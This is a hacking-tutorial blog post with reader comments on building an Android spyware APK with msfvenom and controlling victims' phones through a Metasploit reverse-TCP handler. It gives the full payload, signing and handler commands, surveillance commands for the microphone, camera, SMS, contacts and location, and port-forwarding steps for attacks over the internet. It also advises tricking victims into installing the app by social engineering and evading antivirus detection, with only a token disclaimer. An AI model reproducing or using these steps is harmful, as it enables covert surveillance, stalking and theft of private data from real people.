How to exploit android phones with Metasploit and msfvenom
You have probably heard about the most famous hacking framework called Metasploit. This framework is one of the most used pentesting frameworks which by default is included in Kali Linux.
All the professional hackers recommend Metasploit as their ideal tool for hacking and exploitation of android phones as well and windows devices.
It also has plenty of modules for hacking IOS. The Metasploit and msfvenom are regarded as the best combination for hacking android devices
Table of contents
What is msfvenom?
Msfvenom is an android hacking framework used for making hacking apk files that have embedded reverse shells which can be used for hacking android devices.
This tool was not present in backtrack but is now present in Kali Linux as a separate option to make android hacking as easy as possible. We will be using Metasploit and msfvenom together for this hack.
So why is Metasploit so great?
Metasploit built by rapid7 is a community-based project. It has numerous exploits and hacks made and optimized by the community. The best part is that it is free. To show how effective it is, so lets hack an android device with Metasploit and msfvenom
METASPLOIT AND MSFVENOM
When it comes to hacking Android phones, there are lots of ways for doing so. There are apps, web portals, scripts, and whatnot. We have already seen how to hack an android device with a spy note.
So today we are going to guide you on how to hack android phone using Metasploit and MSFVenom.
For performing this hack using Metasploit or msfvenom, you’ll need Kali Linux OS installed on your computer and Android Phone as a target. And obviously, an internet connection is a must.
Below are the steps to perform this hack using Metasploit or msfvenom. So let’s start hacking.
Step 1: Creating a malicious apk file
Open your KALI LINUX. Open your Terminal and type in the following command
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hackingworld.apk
Output:
**LHOST= YOUR IP address
**LPORT= 4444
**Use ifconfig to find your IP address if you don`t know.
# ifconfig
Step 2: Delivering APK file to the victim
You have now created your malicious spyware .apk file using Metasploit and msfvenom. It will be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target (hackingworld.apk). Use social engineering to do this so that the victim does install the apk.
**If you get any signing errors or issues use the following:
Keytool (Comes Pre-Installed in Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Jarsigner (Comes Pre-Installed in Kali Linux)
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname
jarsigner -verify -verbose -certs hackingworld.apk
Step 3: Metasploit setup
Open up a new terminal and use the following command to start Metasploit framework.
# msfconsole
Now in the Metasploit framework console type the following
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.78.129
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Here
**LHOST= YOUR IP address
**LPORT= 4444
Now when the user opens up the app on his/her phone, you will get a session with that device. And whoa! The device is yours to operate. Metasploit and msfvenom are not that difficult to use but need very methodological steps that need to implement.
Step 4: Exploit..!!!
The moment the victim opens the application on their device, you will get a meterpreter shell on the Kali Linux terminal.
You have now successfully hacked the android device using Metasploit and msfvenom
Some commands you should try using Metasploit and msfvenom:
– record_mic
Records the audio from the android device and stores it on the local drive.
– webcam_snap
Lets you take the images by hacking the android camera of the device
– webcam_stream
Lets you stream live video from the hacked android camera
– dump_contacts
Lets you hack and copy all the contacts from the victim’s phone.
– dump_sms
Lets you hack the victim’s messages and stored it in a text file on your system.
– geolocate
Helps you track the hacked device by location
So, this is how hackers hack using Metasploit and msfvenom on the local network. But what if we wanted to hack android devices with Metasploit over the internet.
So now for some advanced stuff: Hacking Over the internet with Metasploit and msfvenom
So what if we wanted to make the hack work anywhere in the world. What can we do to make the hack global so that we could hack anyone over the internet without buying any expensive server?
Step 1: We need a router which can port forwarding feature. This is a must for hacking over the internet with Metasploit.
Step 3: Next, we need dynamic IP for msfvenom and Metasploit to work over the internet, so go to noip.com and sign up. After signing up,
Click on Add Host and enter any name for the host. Click on save the host.
Step 4: Now Download DUC from the official website or click here. Install the DUC client and sign in to your account. Once you do the IP address for your system will automatically be updated in the DNS. In case this doesn`t happen, you can manually configure the DNS.
Step 5: Click on add hosts on the DUC client as shown. If done properly, you will get all three green ticks.
Set the correct host
All the settings are set
Step 6: Now, we need the gateway IP to port forward from our router settings. So type “ifconfig” in the command prompt, and you will get the gateway IP.
Step 7: Now open any browser you have and paste the gateway IP there. It will prompt the login page. Enter the username and password of your router (by default both are admin for most routers).
Step 8: Now navigate to the port forwarding option. Depending upon the router brand, the page might be at a different location, but the underlying principle is the same.
Step 9: Click on Add Port and put value Add port 2222 again and keep it. You can put any port number you wish.
Step 10: Now, while setting up the two commands instead of my local IP use the ddns you just made on no IP.
So in my case, it would be nightfury007.dns.net instead of 192.168.78.129
Step 15: Now, the rest of the method is the same. You have to use social engineering to make the victim install the APK on their device. This part is something you have to do on your own. It’s up to your creativity.
Step 16: You have successfully hacked into the victim’s phone as soon as they install and open it.
Step 17: You need not use NOIP you can instead of your public IP address while making the apk and setting up Metasploit. But the problem is the public Ip address keeps occasionally changing, so making use of public IP will be a temporary solution.
Just google whats my IP to find your public IP address
Step 18: If you are having any issues with the no IP client. Do not use it instead, just directly use your public IP. Port forwarding is required by default on all hacking methods over the internet.
Commonly asked questions about hacking with Metasploit and msfvenom.
Q.1 Is this hacking tool Metasploit and msfvenom legal?
No. It is not meant for hacking people. It is a tool meant for white hat pentesting only and should be used with the same intent. Hacking World is not responsible for any illegal use done by you.
Q.2 It’s not working what do I do?
Disable firewall and antivirus and then all the steps again. Make sure you do not make any typing mistakes while typing the commands.
Q.3 My antivirus detects it as a virus is it safe?
The apk file made by msfvenom is a virus made by you so obviously unless you use an application like veil framework it will get detected as a virus.
Q.4 I want to hack my girlfriend’s phone how do I do it?
We do not support black hat hacking, and we do not reply and respond to such requests. This article is meant only for educational purposes.
Q.5 Can I use kali Linux with on my phone to use this hack?
Yes, you can use the termux app, or you can use kali Linux nethunter to hack android devices with Metasploit and msfvenom.
Q.6 I do not want to use NOIP?
You can directly use your public IP address.
Q.7 What is the difference between public and local IP address?
Public Address is the address you have on the internet. You can just google whats my IP to find out your public IP.
Your local IP is the IP address of your system on the local network. Use ifconfig for Linux and ipconfig for windows to find out your IP.
You may also like
Top 10 Skills Every Hacker Must Learn
Top 10 Programming Languages for Hacking
18 Comments
If I have my own server how can i use msfvenom.
Rather use noip. It works for dynamic ips. Using your own server is troublesome and you will probably need to install kali Linux on that’s server
After setting all and Tcp is working, if i click on the app, no session is sent
Sir, I was testing on my phone by using first method. After using exploit command (after procced by all commands) the framework dosen’t showing anything. It looks like it cannot got access to the phone. But, before using exploit command I installed the apk and run it just before the suing of exploit command. Still there is no output. and it looks like it got stuck. But, it didn’t and it looks like apk is not working.
Can u help to to understand what is going wrong or may be it was my fault?
Make sure the network setup is correct
Yes, for me I am facing the same problem,bro if you get solution can you please help me
I have been doing some tests and came to the following conclusion.
It doesn’t work at all well on devices running Android 10, 11 and 12.
Another problem I found is that the webcam and microphone functions do not work either. It lacks persistence. Screenshots play audios when taking screenshots.
Any advice or other tool?
Spynote and paid tools work better. Obviously the good tools won’t be free
android is very secure but despite of this fact , android has been hacked by pegasus , I am also an android developer but finding bugs is next to impossible for me in android
Do you have any idea how to find vulnerable points in android? obviously just for educational purpose
sir i have done the first method and its take me to (meterpreter) so what commands should i use plz ?
There is a post Metasploit Commands Cheatsheet
How to hack Android with link with phone
There are many posts on that topic on the site for educational purposes. Check which ones work for you.
hey like i start streaming command now how to off it or exit from it and start another command?
HOW CAN I EXPORT THE APP TO SAND MY VICTIME ANDROID PLZ EXPLAIN
Social enginnering
I made the payload apk but when i am trying to run on my on the target phone it says “the app was build for an older version of android and may not work properly”
Kindly help me regarding this matter.
Thank You
Msfvenom is an old tool maybe that’s why.